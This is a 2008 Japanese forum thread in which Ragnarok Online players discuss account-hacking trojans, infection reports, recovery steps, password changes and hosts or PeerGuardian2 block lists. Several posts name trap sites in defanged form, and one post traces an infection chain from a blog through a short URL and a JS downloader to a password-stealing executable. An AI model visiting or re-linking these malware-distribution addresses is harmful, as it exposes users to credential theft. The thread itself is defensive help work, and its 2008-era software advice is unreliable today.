431 名前:(○口○*)さん:08/05/03 07:41 ID:h93t2wCY0
症状?白い画面でて〜ってもうテンプレ通り
カスペルスキーでスキャン中です
その間にゲームにログインはしていませんが
ガンホーID パスにはログインしてしまいました。
セフセフ?

432 名前:(○口○*)さん:08/05/03 08:17 ID:wdCe76DG0
何処のスレもお子様で満ちあふれてるな

433 名前:(○口○*)さん:08/05/03 08:19 ID:Zr6lg3+c0
>>431
ログインしなければパスは絶対に抜かれない
つまり
そのままゲームをやめればハックされることもないぜ!

冗談はさておき、不安ならクリーンインストール汁。

434 名前:(○口○*)さん:08/05/03 08:24 ID:h93t2wCY0
>>432
>w<

>>433
やったー!絶対抜かれないんだ!中華ざまぁ!フリーチベット!
ありがとう
ついでにクリーンインストールkwskぐぐってきます

435 名前:(○口○*)さん:08/05/03 08:31 ID:t0twUnWa0
>431
せめて相談用テンプレ(>4)に沿って書いてくれ……
でないと回答しようがない。

そして netgamerjp をソースチェッカーで覗いてみたら
いきなりVBScriptなコードのお出迎えで吹いた。
jpmmなEXEが仕込んである上、I LOVE CUTEQQ TEAM だとさ。


>433-434
既に癌公式にはログイン済みっぽいから、ゲームを辞めても
ハクられると思うぞw

いや、笑い事じゃないけどさ。

436 名前:(○口○*)さん:08/05/03 08:32 ID:h93t2wCY0
なんやて!
別PCでパス変えてくる!!でおk?

437 名前:(○口○*)さん:08/05/03 08:38 ID:Llgd4DpP0
今すぐやってこい

438 名前:(○口○*)さん:08/05/03 08:41 ID:h93t2wCY0
ういっす!

439 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/03 08:48 ID:3194+uQN0
>>431
ふと気になったのはROにログインしていなくても
ガンホーのアトラクションセンターにログインしてしまったと
書いてあるように読み取れるのですが。

怖がらせる事例になってしまうのですが、
ガンホーIDとそのパスワードが抜かれるウイルスの場合は
それらを使って、アカウントのパスワードを変えてから
アイテムを盗んだ後にガンホーIDを削除されてしまったと言う、
被害報告があがっていました。

多分、現在クリーンインストール中と思われますが
念のために終了後>>6の手順を踏んだ後で
ガンホーIDのパスワードを変えた方がよろしいかと。

440 名前:(○口○*)さん:08/05/03 09:04 ID:h93t2wCY0
カスペ様は駆除できないってでてきました

いろいろ怖いのでリカバリしてきます。

さようならわたしの4時間

441 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/03 09:10 ID:3194+uQN0
と…>>435さん手早いフォローGJ。

最近RO側ではブログ等で
アカウントハックの書き込みを見ることが少なくなりました。
ただ今のように被害が挙がってきてはいますが。

むしろmixiでRO関連の日記を書くと、
業者がホイホイ書きこんでくるようです。
mixiにログインしていない時に気が付かないうちに書き込まれている物は
報告があれば運営側で削除している模様。

対応策としては
・とりあえずリンクがあってもクリックしない。
・クリックするならaguse.jp(http://www.aguse.jp/ )等でチェック。
・危険サイトリストに入ってないかリネージュ資料室さんで調べる。
・アカウントハックURLだと判ったらmixiの運営に報告する。
・設定で日記の公開設定を"全体に公開"以外にする。
 (全体公開でもROの日記だけ個別に変えてやることも出来ます。)

ぐらいでしょうかね…。

442 名前:(○口○*)さん:08/05/03 09:23 ID:h93t2wCY0
リカバリすれば100%安全なん?

443 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/03 09:33 ID:3194+uQN0
リカバリーディスクが添付してあるようなメーカーPCの場合、
それを使ってリカバリーすればOSは購入当時の状態に戻ります。
手動でクリーンインストールした場合もほぼ同義。
どちらも実行前に重要な個人データ(txtとかjpgとか)はどこかにバックアップ。

リカバリー後はセキュリティ的に手付かずの状態なので
WindowsUpdateは必須です。
それにネットにつなぐ前にアンチウイルスソフトがあれば、
繋ぐより先にインストールしておく事で安全性は増します。

444 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/03 09:42 ID:3194+uQN0
とりあえずテンプレ >>1-7
大体のことはテンプレに書いてある事で対応できます。

442さんが425の人なら早くデータをバックアップして、
リカバリーないしクリーンインストールの作業を。
別PCでここを覗いているのであれば、
テンプレ>>4に沿ってどこで踏んだか報告があるとよい仕事。

445 名前:(○口○*)さん:08/05/03 09:52 ID:Y//YfsV50
今までに報告事例のある垢ハックウイルスの一覧表みたいなの無い?

446 名前:(○口○*)さん:08/05/03 09:56 ID:1mbSLJWR0
それはまとめ臨時氏を前にして言うことかw

447 名前:(○口○*)さん:08/05/03 10:22 ID:8pBMHfq0O
まとめ臨時君ありがと〜
被害あるまえに色々対策できた気がします
別PCでパスも変えたし…

448 名前:(○口○*)さん:08/05/03 11:23 ID:Y//YfsV50
>>446
臨時まとめサイトサクっと見た感じでは、一覧みたいなのなかったからな

449 名前:(○口○*)さん:08/05/03 11:32 ID:wdCe76DG0
ウイルスの名称なんて対策メーカーによってまちまちなんだが?

450 名前:(○口○*)さん:08/05/03 11:36 ID:Y//YfsV50
それは知ってるがウイルス名分かればココじゃなくても、各メーカーページ見にいけば対処載ってるだろうよ

451 名前:(○口○*)さん:08/05/03 12:41 ID:rc2pEJrc0
個々のウイルス毎の対処なんて知ってどうするんだ…

452 名前:(○口○*)さん:08/05/03 19:26 ID:mexz2hYE0
質問。
ファイアフォックスをダウンロードするウィルスってあるのかな?
普段ネットにつなげっぱなしで電源いれっぱなしのマイPCなんだけど
昨日、仕事から家に帰って来たらなぜかファイアフォックスがダウンロード
されていたんだ。
いつもIEのウィンドウをはいくつか開きっぱなしにしてたが、それは閉じられていた。
これは、ウィルスの仕業なのだろうか…?

他に考えられる可能性としては
ときどき遊びに来る妹なんだが。

だとしたら
エロ小説サイトを開きっぱなしにしておいたのがきまづい。

453 名前:(○口○*)さん:08/05/03 19:32 ID:je/oDuuv0
ねーよ。AdobeReaderだかRealPlayerだかDivXだかに
Firefoxが丸ごと入ってた気がする。

454 名前:(○口○*)さん:08/05/03 21:08 ID:LcFJL6DS0
>>452
妹ウイルスワラタ。多分、下記が検出されてると思う。

IMOUTO.Downloader.fox
IMOUTO.Closer.ero
IMOUTO.Checker.histoty
IMOUTO.Deleter.erog

455 名前:(○口○*)さん:08/05/03 22:12 ID:DcLdb5Ie0
そのウイルスは防御不能だな

456 名前:(○口○*)さん:08/05/04 01:25 ID:k5F0j7sy0
>>452
最近使ったファイルやIEの履歴なんかチェックすればもっと楽しいかもしれん

457 名前:(○口○*)さん:08/05/04 07:01 ID:VL5m21sT0
>>453
そういうウィルスじゃないのか
それじゃやっぱり…

あー、勝手に人のパソコンいじるなって言おう。

458 名前:(○口○*)さん:08/05/04 08:36 ID:2Cc+wuQh0
>>457
セキュリティ的に見て妹が正しい

459 名前:(○口○*)さん:08/05/04 09:04 ID:bmJpUq2p0
>>457
妹ウイルスに有効なのは卑猥な壁紙でセキュリティ

460 名前:(○口○*)さん:08/05/04 09:05 ID:ujlbz/5f0
Trojan.Hachilem!gen
はアカハックウィルスではありませんよね?
すぐ消去したのですが…無知な質問ですみません。

461 名前:(○口○*)さん:08/05/04 09:27 ID:ruqdu2fH0
>>460
無知なあなたはまずググるということを憶えるべきだ。

ざっと検索結果見たけどなんかやばそうなシロモノだねぇそれ。

462 名前:(○口○*)さん:08/05/04 09:30 ID:XgQpi3ML0
アカハックじゃないかも知れんがHachと付いてるからハックウィルスだろうな

463 名前:(○口○*)さん:08/05/04 11:52 ID:2Cc+wuQh0
Trojan.Hachilem
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2005-070812-1520-99

>Trojan.Hachilem はメールアドレスを盗み取り、ユーザに無断でポルノサービスに登録するトロイの木馬です。

エロサイト廻りも程々になw

464 名前:(○口○*)さん:08/05/04 13:35 ID:ujlbz/5f0
レスありがとうございます。
グーグル&シマンテック等のウィルス検索で調べてはみたのですが心配になって質問させていただきました。

>>463
私はFirefoxを使っているので弟がIEで見てたのかもしれませんw
でも自分の責任も否定できない/(^o^)\

465 名前:(○口○*)さん:08/05/05 01:49 ID:VcG0Vpyc0
教えてくださいな。
mixiの日記のコメントに
www■netgamerjp■com/wiki/
が書いてあったんですけど、これはROやってない人には無害なんでしょうか?

466 名前:(○口○*)さん:08/05/05 01:57 ID:KLPWhFhP0
>ROやってない人には無害
とりあえず、そういう思考を直すところから始めようか

467 名前:(○口○*)さん:08/05/05 02:01 ID:VcG0Vpyc0
>>466
という事はmixiのパス抜かれるとかどこかにばら撒いちゃう可能性があるって事ですか?
とりあえずmixiの事務局には通報しときましたけど。

468 名前:(○口○*)さん:08/05/05 02:16 ID:W64B0/kx0
>465
踏んだら感染するタイプなんだから、どんなタイプだって仕込める。

今はRO限定かもしれんが、10分後にはリネ限定の罠に更新されてるかもしれない。
もしかしたらネットバンクを狙うタイプやmixiを狙うタイプが仕込まれてるかもしれない。
その辺りはハク犯(この場合は中華)の考え1つで変わる。

過去に罠報告があって、1時間しないうちに別タイプに更新されてたケースもあるし
ROの罠だから・ROの罠じゃないから、とかいう考えは危険。

469 名前:(○口○*)さん:08/05/05 08:37 ID:NAURJHHe0
>>465>>425-を読むべき

470 名前:(○口○*)さん:08/05/05 08:46 ID:5RY7XfWS0
黄金厨

471 名前:465:08/05/05 10:12 ID:VcG0Vpyc0
>>468
ああ、なるほど。
踏んだ瞬間はmixi限定の罠が張ってあったかもしれないし、jpmmにmixiパス収集のコードが加えられてる事も考えられるのですね。
firefoxだったしカスペル様のオンラインスキャンでも検知されなかったんで、ROやってない人間には無害ならばステルス化している可能性に目をつぶってこのまま使いつづけようかと思ったんですが・・・
どうやら『Free Tibet  China Free』を叫びながらクリーンインストールした方がよさそうですね。ヽ(`Д´)ノ ウワァァァァァァン!!!

>>469
netgamerjpをググッたら>>425に引っかかってこのスレに辿り着きました。

>>470
>w<

皆さんどうもありがとうございます。(T_T)

472 名前:(○口○*)さん:08/05/05 21:58 ID:usayl1tg0
総合スレ>647-648
646は「具体的手法」について扱ってるので問題無い。
おまいらの書き込みの方がS/N比を悪くする原因だ。自重しろ。

473 名前:(○口○*)さん:08/05/05 22:26 ID:WuJ3EDVj0
むしろ誘導キチガイが重要な情報を埋めてる件
「重要な情報が〜」「Nice bot.」あたりを透明あぼ〜ん設定すれば見やすくなるが

474 名前:(○口○*)さん:08/05/05 22:48 ID:usayl1tg0
>総合スレ649-650
突っ込みはこっちでやれよ。愚痴スレに対する突っ込めスレみたいにさ。

475 名前:(○口○*)さん:08/05/06 00:15 ID:BeWWg10q0
と言うか向こうはロクに機能してないし馬鹿も規制されないからもうこっちでまとめちゃった方がいい気がする

476 名前:(○口○*)さん:08/05/06 02:51 ID:WRqJzByQ0
>>473
S/Nと書かれてシリアルナンバーしか思いつかないんだが

477 名前:(○口○*)さん:08/05/06 03:37 ID:udt9AE3n0
が、何?

478 名前:(○口○*)さん:08/05/06 03:52 ID:WIE1zSYR0
S/Nは信号対雑音比
信号(Signal)と雑音(Noise)との量との比率(S/N)によって品質を表現する。

信号=重要な情報、雑音=必要ない情報

>>475
スレ自体で纏めるのは無理だと思う
特定の人のみが更新可能なパスワード制限付きのWikiかCGIを使って
纏めていくしか道はないのかな
ミイラ取りがミイラにならないように信頼できる人を募集するとか
難易度は高いですがね

479 名前:(○口○*)さん:08/05/06 04:16 ID:b5C2GseT0
向こうは廃棄して、こっちで全て取り扱う、って事だろ。


それと情報の取り纏めは、今は臨時の人がやってくれてる。
臨時の人のサポートするにせよ、信頼出来る人を募集ってのは
正直難しいと思うな。

それにスレテンプレの改訂すら進展無い状態がずっと続いてるし。
スレを統合(というか向こうを廃棄か?)ぐらいなら決めれると思うけど
今の状態を考えると、それ以上は動けないと思う。

480 名前:(○口○*)さん:08/05/06 04:25 ID:hJTTc1fe0
サイトは
ttp://rosafe.rowiki.jp/
を再利用させて貰えばいいんでない。
今は半ば放置状態で誰でも編集できるけど、弓の中の人に言えば
>>478 特定の人のみが更新可能なパスワード制限付きのWikiかCGIを使って
のようにでもどうとでもしてくれるだろう。

481 名前:(○口○*)さん:08/05/06 10:22 ID:kioCl2mG0
向こうのスレは、>>210でも書いたけど、最初のスレが建てられた時からは情勢が変化し過ぎて、時代にそぐわなくなってきている。
Domain Tasting/KitingなどAGPルールが濫用されるようにもなりつつあり、もはやFQDNだけでは悪意あるサイトをブロックし切れない
時期が来ているような気もする。CIDR表記によるIP-range指定で止めた方が無用なトラブルが起きないかもしれない。

それとは別に、編集権限を絞りこむには、不埒な輩の潜入を防ぐ手だても必要かも。
現在組まれている、ROサイト管理者連絡会の下位部会として、セキュリティ部会あたりを立ち上げるのが無難な落とし所かも。

482 名前:(○口○*)さん:08/05/06 12:16 ID:CkqeqfFC0
総合スレではノイズ扱いの一般的話題でも、こっちでは、シグナル扱いだったりするしなー

総合スレでの過剰な誘導はやめて、こっちで突っ込むことだけ努力してればいいよ。
それができない奴は空気扱いで。

483 名前:(○口○*)さん:08/05/06 13:26 ID:J6Mhlfn40
総合スレはデコイだな

484 名前:(○口○*)さん:08/05/06 17:07 ID:OsR2BirZ0
【      気付いた日時          】 本日16時
【不審なアドレスのクリックの有無 】有
【  アドレス   】http://ja■wikipedia■org/wiki/%E5%8D%B8%E5%A3%B2
【     OS    】WindowsXP Professional SP2 (SP等まで正確に書く)
【使用ブラウザ 】Sleipnir
【WindowsUpdateの有無】先週の金曜くらいに
【 アンチウイルスソフト 】 Symantec AntiVirus
【その他のSecurty対策 】 Spybot S&D、PG2
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンでTrojan-Downloader.Win32.Banload.lxfを発見
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】有・リネージュ資料室等を参考
【説明】
WIKIを見る際に、PG2を一時的に切る→終わった後に復帰させるを行ったところ、
急激にPG2が反応したので不審に思い、完全スキャンをかけたところ、外付けのHDDから上記のウィルスが
検出されました。
ウィルスの名前をググったところ、同じ拡張子のウィルスの情報が出てきませんでした。
SymantecとSpybotで現在検出を行っていますが、このトロイは危険なものなのでしょうか。

485 名前:(○口○*)さん:08/05/06 17:28 ID:CkqeqfFC0
>このトロイは危険なものなのでしょうか。

危険の程度は千差万別かもしれないが、危険性の無いものであれば、トロイやウイルスとして認定されたりはしない。

486 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/06 18:31 ID:NeFFrfrx0
>>445
ウイルス名を一覧でまとめると言う点については
各メーカーでそれぞれ名称が
>>449 さんの言われるように違ったりする事や
アップデートされるたびに
各メーカーをチェックしなければいけないという事があります。
何より手間隙な労力を想像すると
時間的にやってられないと言う状況に陥りそうな作業です。

また、ウイルス自体はどこかしらのサイトに置かれている事、
どんなタイミングか判らないけど差し替えが行われている事などから
ドメイン・サイト名を抑えさえすれば、
いくつかの例外を除けば一応防ぐことが出来ます。

こういったことから結果的にドメイン・サイト名は纏められているものの、
そのサイトに置かれていたウイルス名の一覧が纏められていないのだと思います。

487 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/06 18:36 ID:NeFFrfrx0
しかしながらウイルス名一覧自体は
データ資料としては有効ではあると思います。
(例えば >>484 であげられている外付けHDDから発見されたので
どういった物か知りたい時や
>>445さんのように例えばで見つけたときの対処方法が知りたい場合)

ただ、ウイルス名を知って調べるような状況と言うのは
踏んでしまった後にアンチウイルスソフトが検知した時が一番多いかも?

この場合罠URL自体の先が既知ウイルスだけであればいいのですが、
差し替えられていたりすると出来る対応は
自己責任による監視か
お約束のリカバリやクリーンインストールになってしまうので…。

488 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/06 18:42 ID:NeFFrfrx0
身も蓋も無いことですが、ぶっちゃけた話、
本家まとめさんでやられていたと思われるやり方を
そのまま真似しているだけなんだ…。

総合対策、セキュスレの先輩ら、本家まとめさん、
BS-Templateさん、リネージュ資料室さんに教わって出来たのが
今の自分の知識。

有志の検体提出や発見した罠サイトの報告等のみなさんの善意の作業と、
被害のテンプレ報告等を見て対応する事で
アカウント対策が成り立って居たりします。

489 名前:(○口○*)さん:08/05/06 18:56 ID:kioCl2mG0
>>484
Trojan-Downloaderの名前通り、何かをダウンロードさせる踏み台トロイなので、一概に危険度を示すことは出来ない。
ただ、ダウンロード先から何を運んでくるかが未知数なので、駆除できるにこしたことはない。

それと、Wikipedia(混同を避けるためにWikiとは表記せず)閲覧の間だけPG2を無効化するような使い方は、結果的にセキュリティリスクを
高めていると言えよう。
終了後の復帰を忘れたまま、他のサイトを閲覧したり、閲覧中に外部からの攻撃に曝されるといったヒューマンエラーの危険性がある。
Wikipedia自体を、PG2のブロック対象から外す方が望ましい。
それと、外付けHDDということから、感染源がそのPCと断定する事も不能。
呈示されたアドレス自体は、特に問題となる要素は見つからなかったが。

490 名前:(○口○*)さん:08/05/06 19:17 ID:OsR2BirZ0
>>485 >>489
なるほど・・・一概にトロイだから絶対に垢ハックであるってわけではないってことですかね。

何処で何をやったからなのかはわかりませんが、リカバリー直後のPCと今使っているPC以外で
外付けを使ってはいないので、多分こちらのPCが原因で外付けについたのではないかと思ってます。

色々と考えるのが面倒になったので、外付けをフォーマットしました。
結果として外付けからはトロイ自体は消滅したっぽいのでこれで様子を見てみます。
ありがとうございました。

491 名前:(○口○*)さん:08/05/06 19:52 ID:4EgW/ikY0
ネカフェスレで帰宅までの間にID消されてたとかいう話あった
装備撒くよりタチ悪いね

492 名前:(○口○*)さん:08/05/06 20:52 ID:qdtApLYx0
スレ違いかもしれないんですが
警察に捜査以来出して5ヶ月たちました
進展があったら電話するといわれたのですが5ヶ月一度も来ません
本当に無いなか問い合わせるのは気が引けてしまいます
もし問い合わせた方いらっしゃったり、アドバイスなどあればどうかお願いできないでしょうか

493 名前:(○口○*)さん:08/05/06 21:09 ID:1dJ7aqwk0
>492
心置きなく聞いていい
彼らは税金で働いていると考えるんだ

494 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/06 21:10 ID:kWJSvfrq0
今までの救済事例を見ると、
早い方では二ヶ月ぐらいで大体半年ほど掛かっているみたいです。
全く連絡が無いので電話をしたら、
実は調査が終わっていたと言う事もあるそうなので
余計な気を回さずに、その後どうなっているか聴いてみても大丈夫かと。

それに一週間置きとは言わなくても
一月置きぐらい連絡を取る分には問題は無いと思います。

495 名前:(○口○*)さん:08/05/07 00:24 ID:QoOeN4YZ0
>>493
>>494
ありがとう(´;ω;`)
ちょうどGWあけたし明日電話してみる!

496 名前:(○口○*)さん:08/05/07 01:19 ID:jQn4GTun0
知らぬ間にCドライブに CountCyclesWMVDecLog というtxtファイルが
2008/3/25 19:40に作成されているのに気付いて
ググると原田ウィルスに関係があると出るが、今まで実害も無く
カスペ等のフルスキャンでも何もでない。3/25に関係ありそうな動画ファイルは見つからなかった
OSはwin2k、avast、spybotS&D、PG2が入ってる。
グーグル以上の情報は手に入らなかったが
念の為、これが何かウィルスに関係あるようなら教えて貰えないだろうか

497 名前:(○口○*)さん:08/05/07 08:24 ID:m4Q5Uokj0
WindowsXP SP3 リリース
保存版
ttp://www.microsoft.com/downloads/details.aspx?FamilyID=5b33b5a8-5e76-401f-be08-1e1555d4f3d4&DisplayLang=ja
CDイメージ
ttp://www.microsoft.com/downloads/details.aspx?FamilyID=2fcde6ce-b5fb-4488-8c50-fe22559d164e&DisplayLang=ja

498 名前:(○口○*)さん:08/05/07 10:56 ID:Hf6ENDAT0
SP3は通常のWUと違ってシステム的には割と大きな変更になるので
導入前にバックアップをお忘れなく。
可能ならシステム丸ごとバックアップ、ぐらいはした方がいい。

またIE7やIE8Bataを入れてた場合、SP3当てた後ではIEのアンインストールが
出来なくなるようなので、一旦IEをアンインストールしてIE6の状態にしてから
SP3を当てて、完了後に再度IE7を入れなおした方が無難っぽい。

499 名前:(○口○*)さん:08/05/07 12:16 ID:Hf6ENDAT0
>496
同じようにググっただけなので何とも言えないが、原田ウィルスが
使うファイルらしいとしか判らなかった。

原田ウィルスは亜種が多いから、カスペでもまだ対応してない代物に
引っかかった可能性も0とは言えない。
カスペのスキャンを信じるか、OS再インストールするか、のどちらかに
なるんじゃないかな。

500 名前:(○口○*)さん:08/05/07 16:27 ID:m4Q5Uokj0
>>498 補足。
今後IE7からIE6に戻る気がないならサクッと入れてよし。
ただしIE8Beta1の人はIE7に戻してから入れるべし。
IE8Beta1→IE8Beta2-(略)→IE8正式版
という入れ方はできず毎回アンインストールする必要があるが
そのアンインストールができなくなるため。

501 名前:(○口○*)さん:08/05/07 17:15 ID:HcM81SoD0
ROに使ってなかったPCを一ヶ月ぶりに起動してWindowsアップデートしてから
ROのパッチあてたところRagnarok.exeファイルが消えて起動できなくなりました。
(リスタートを押したらそのままリスタートが何度も表示されて
どうにもならないので再起動かけたらragnarok.xexを探してますとでて
そのファイルがなくなっていた)

ほかのPCから移動させたら起動しましたがログインはせずに
いったん落としてからカスペルスキーでオンラインスキャンをかけました。
レポートでは検出されずになっていましたが何が原因で消えたのか
わからないため諦めてOSの再インストールしたほうが安全でしょうか?

502 名前:(○口○*)さん:08/05/07 18:00 ID:kBn2V8vE0
XP SP3は結構時間掛かるな
環境にも依るんだろうけど大体15分くらい掛かった
焦らず時間があるときにやった方が良いかもね

あと、他所での書き込みで USBメモリとか USBに接続する物を差しっぱなしに
していたら失敗したとあるから全部抜くのがよさそう

ウイルス対策ソフト等の常駐ソフトも全部解除しないと失敗することがあるっぽい

#まぁ、基本的なことだけど念のため

503 名前:(○口○*)さん:08/05/07 19:28 ID:SumLri7e0
あと、余裕がある人はSP3統合CDを作成して、クリーンインストールするとゴミが少なくて済むのでお薦め。
手順などは、検索すればいろいろ出てくるので割愛。

504 名前:(○口○*)さん:08/05/07 20:34 ID:jQn4GTun0
>>499
グーグル以上の情報は無いか。レスありがとう。

505 名前:(○口○*)さん:08/05/08 13:41 ID:ObvtjvsS0
>>501
原因はシラネ
パッチ当てに失敗しただけかもしれない

ゲームファイルが壊れた場合は他のPCから持ってくるんじゃなくて、必要なファイルのバックアップ後に
ROのアンインストール及びGravityフォルダの完全削除をしてRO再インストールをお勧めする

絶対に安心したいならOS再インストールだね

506 名前:(○口○*)さん:08/05/08 20:26 ID:SZwHj+Ib0
お尋ねしたいのですが、今日ネカフェからchaos GvG historyを見て、
神器・ボスレア所持者一覧のページから
『逆引きはこちら→「神器・ボスレア簡易まとめ」』のURLを踏んだところ、
ネカフェのウイルスソフトが作動して、脅威が検出されました、と出たのですが、
これは垢ハックのサイトを踏んでしまったのでしょうか??
飛んだ先は普通のブログで上に書いてある内容とは全く関係ないと思われる
ものだったので不安に思い、相談してみました。

ちなみにその飛ぶ先のURLは
ttp://world2001■blog39■fc2■com/
です。
自分にパソコンの知識がほとんどないのでよろしければ詳しく教えてもらえるとうれしいです


507 名前:(○口○*)さん:08/05/08 20:51 ID:eJm6dd/J0
>>1

508 名前:(○口○*)さん:08/05/08 21:16 ID:YS/1Dcn50
>506
初心者なら尚さらテンプレ使おうな。

で、>507(のメル欄)のいう通りで、罠を踏んでる。
よくあるサイズ0のiframeの罠。
防いでると思うが、防げてない可能性もある。

テンプレに沿ってくれんと何をやったか(ROへのログイン等含む)分からんし
安全な環境でPASS替えて来い、としか言えんよ。

509 名前:(○口○*)さん:08/05/08 21:27 ID:YS/1Dcn50
ところで最近は(>506含めて)短縮URLで仕込みに来てるケースが
多いように思えるんだが、実際のところ短縮URLを有効活用してる
例ってあるんだろうか?

hostsに短縮URLサービスそのものを危険アドレス扱いで登録した方が
いいんじゃないだろうか?と提案してみる。

俺個人は既にそうやってて困ったことは一度もないけど、それで困る人って
いるのだろうか?
短縮URLサービスって中華系しか使ってないように思えて仕方が無い。

510 名前:(○口○*)さん:08/05/08 21:32 ID:coUUZVA90
まぁ、こんな感じで呼びだされて、既知のアカハックトロイを落としてくる訳ですが。

ttp://world2001■blog39■fc2■com/
ttp://tinyurl■com/6722xv
ttp://www■panslog■net/wiki/index1■htm
ttp://www■teamerblog■com/wiki/cer■exe

index.htm : HTML/Infected.WebPage.Gen(AntiVir)
index.htm : Trojan-Clicker.HTML.IFrame.il
index1.htm : Trojan-Downloader.JS.Agent.brl
cer.exe : Trojan-PSW.Win32.OnLineGames.wmz / Trojan.Win32.Inject.ama

511 名前:(○口○*)さん:08/05/08 21:33 ID:coUUZVA90
>>509
イベント系サイトの宣伝で、PT名等に収まるように利用してたな。
転送url自体のブロックは過剰防衛じゃないかって気がするよ。

512 名前:(○口○*)さん:08/05/08 21:39 ID:coUUZVA90
>>510
総合スレに報告されてた事例そのまんまだったわ

アカウントハック総合対策スレ9
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/652

513 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/08 21:48 ID:9+Qewj5i0
>>506
テンプレは>>1-7
相談する場合は >>4 を使用するとレスが付けやすくなります。
とりあえず感染したPCではROに限らず、
パスワードを使用(利用)する操作をしてはいけません。

ネカフェからの接続との事ですので、
直ぐに自宅PCでパスワードを変更できればベター。
自宅にPCが無いネカフェのみのRO接続利用者なら
別の席に変えてもらってパスワードを変更…と行きたい所ですが
替えてもらった席も安全かどうか判らないので…
カスペルスキーオンラインでフルスキャンした後で
何も見つからなければその場で変更出来なくも無いですが不安材料が多いですね。


ところで携帯端末でそこからPASS変更とかできるのでしょうかね…
それよりネカフェでウイルスを踏んでしまった場合、
PCにリセットが掛かるような所ならまだ安心できそうですが
そのまま接続されているような所だと二次被害が広がりそうな気がします。

514 名前:506:08/05/08 21:58 ID:SZwHj+Ib0
みなさんご返答ありがとうございました。
とりあえず席は移動してパスは変えたのですが、
自宅に帰ったらもう一度変更してみようと思います。

店員に聞いたみたところ、再起動の際にリカバリーはされるみたいなので
PCは落とせば平気と言われました。
テンプレにそった形で質問ができなく申し訳なく思います。
ありがとうございましたm(_ _)m

515 名前:(○口○*)さん:08/05/09 00:07 ID:+rPZuNDF0
広告やブラクラと言った禄でもないのばっかりだから転送URLを全て
あぼ〜んする設定にしてるが特に困ったことはないな

516 名前:(○口○*)さん:08/05/09 00:08 ID:8dJ6/kSI0
オンラインゲーム関連の不正活動に注意、トレンドマイクロ4月レポート
http://internet.watch.impress.co.jp/cda/news/2008/05/08/19473.html
http://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20080508025143.html

517 名前:(○口○*)さん:08/05/09 01:17 ID:d0E7e5AC0
>514

>とりあえず席は移動してパスは変えたのですが、
ネカフェでアトラクションセンターにログインした?
念のため、家でガンホーIDのパスも変更しておくんだ。

518 名前:(○口○*)さん:08/05/09 05:38 ID:auXJkYq10
かつては、紙媒体などでの表記スペースの都合や、手入力の手間、サイト移転時のアドレスの一意性などで転送/短縮URIサービスが
持て囃されていたが、今ではいくらでも代替手段が出てきたから。

媒体への表記はQRコードが主流となり、それ以外でもアドレスバーへの日本語キーワード直接解釈により、そもそもアドレスを入力する
必要が無くなった。むしろ、短縮URIのtypoや誤記により、悪意あるサイトへ転送されるリスクも警戒する必要がある。
アドレスの一意性は、独自ドメインの取得が容易になった事により、自己証明としても一般化しつつある訳で。

519 名前:(○口○*)さん:08/05/09 20:19 ID:hWx6css50
すいません。どこで踏んだか不明なんですが
先日カスペでスキャンをしたら
Trojan-PSW.Win32.WOW.elと言うトロイが発見されました。
今削除をしたのですが、これは垢ハックウィスルですか?
削除したのでパスなど変えて大丈夫でしょうか?初歩的な質問ですいません

520 名前:(○口○*)さん:08/05/09 20:26 ID:92Sp0lN/0
>>519
http://www.viruslistjp.com/viruses/encyclopedia/?virusid=130036
他に何紛れてるかわからないから安全とは言えません
万全期したかったら再インストールどうぞ

521 名前:(○口○*)さん:08/05/09 20:42 ID:hWx6css50
>>520
回答ありがとうございます
垢ハックウィルスみたいですね。カスペで検知後削除して、その後またスキャンをしたけどもう検知はされませんでした
でも不安なんで520さんの言うとおり再インストールします。

522 名前:(○口○*)さん:08/05/09 23:51 ID:PI7MYOBb0
質問はこちらのスレでよろしいのでしょうか。
先日感染した知り合いからメッセで送られてきたものです
ソースチェックの方法がわからないのですが、
下記URLにはどんなものが仕込まれているのでしょうか?

ttp://kaede740■cache3■real■awes0mestuff■info

523 名前:(○口○*)さん:08/05/10 00:00 ID:/nSobnaS0
XPのSP3がきたおかげでリカバリしやすくなったな。
今までのセキュリティパッチはSP3に入っているから
長ったらしいWindowsUpdateも短縮できるぜ。

524 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/10 00:13 ID:JEeJhIbe0
>>522
ソースチェッカーオンライン( http://so.7walker.net/guide.php )で
所定のURLを貼り付けてcheckをクリック。

インラインフレームの存在や記載されているURL、
ドメインの所在地やソース自体の記述内容で
おおよそですが判別できたりします。

試しにかけてみた所、"ドメインウェブの設定が見つかりません"とのこと。
既に消されているのか設定が間違っているか反映されていないのか
こちらでは確認は取れません。
怪しいと思うならリンク先に飛ばないほうがよろしいかと。

525 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/10 00:33 ID:JEeJhIbe0
5/8付でリネージュ資料室さんで
提供されているPG2リストとhostsファイルですが、
失効したドメイン等を整理して削除したとの事です。
PG2でのドメイン失効分の反応が緩和されるみたいですね。
資料室さん選別作業本当にお疲れ様でしたありがとうございます。

hostsファイルリストも削除された件数がかなりありますので
最新版のリストに差し替えてもいいかもしれません。


ただhosts分をスクリプトで自動取得している場合は
資料室さんの最新のhostsファイルを取得している場合、
削除されているドメイン分をまとめ臨時側のほうで
改めて取得しなおしてしまう問題が発生してしまうかも知れません。

526 名前:(○口○*)さん:08/05/10 10:19 ID:QOr/iN7p0
>525
別に問題ないんじゃない?
失効した罠ドメインを別の所が取得して、ユーザーがそこにアクセスする必要が
出る事ってまず無いだろうし。

もしそういうケースが出たとしても、スクリプトの方で除外設定リスト作れば
リストから省かれる。
もし残骸がまとめ臨時側に残ってたとしても、それを邪魔と思わなければ
何ら支障はないかと。

527 名前:(○口○*)さん:08/05/10 18:22 ID:XRpdAeRmO
初カキコです。
昨日ログインしようとログインパスを入力した所
1回目:わざと違うパス入力したら10秒位後に「パス違います」と出現
2回目:正確なパス入力後すぐにサバキャン
3回目:正確なパス入力後すぐにサバキャン

となりました。
